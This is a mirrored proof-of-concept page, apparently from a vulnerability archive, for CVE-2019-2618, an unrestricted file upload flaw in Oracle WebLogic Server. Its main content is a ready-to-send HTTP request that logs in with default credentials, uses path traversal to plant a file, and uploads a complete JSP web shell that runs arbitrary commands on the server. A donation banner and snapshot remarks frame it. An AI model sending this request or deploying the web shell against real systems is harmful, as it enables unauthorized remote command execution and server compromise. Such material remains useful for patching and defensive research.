Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-2618 PoC — Oracle Fusion Middleware WebLogic Server 访问控制错误漏洞

Source
https://github.com/pyn3rd/CVE-2019-2618
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server 访问控制错误漏洞 (CVE-2019-2618)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server组件10.3.6.0.0版本和12.1.3.0.0版本和12.2.1.3.0版本的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞未授权
Description
Weblogic Unrestricted File Upload
Readme
### PoC

```
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host:  127.0.0.1:7001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html, image/gif, image/jpeg, */*; q=.2
Connection: keep-alive
username: weblogic
password: weblogic
wl_request_type: app_upload
wl_upload_application_name: \\..\\tmp\\_WL_internal\\bea_wls_internal\\9j4dqk\\war
wl_upload_delta: true
archive: true
serverName: pyn3rd
server_version: 10.3.6.0
Content-Type: multipart/form-data; boundary=---------------------------55365303813990412251182616919
Content-Length: 982

-----------------------------55365303813990412251182616919
Content-Disposition: form-data; name="img"; filename="cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<html>
<body>
<form  method="GET" name="myform" action="">
<input type="text"  name="cmd">
<input type="submit" value="send">
</form>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<br>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</body>
</html>
-----------------------------55365303813990412251182616919--
File Snapshot

 [4.0K]  /data/pocs/b9df72e25bac1ebc0152323d37341ba3d737210a
└── [1.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.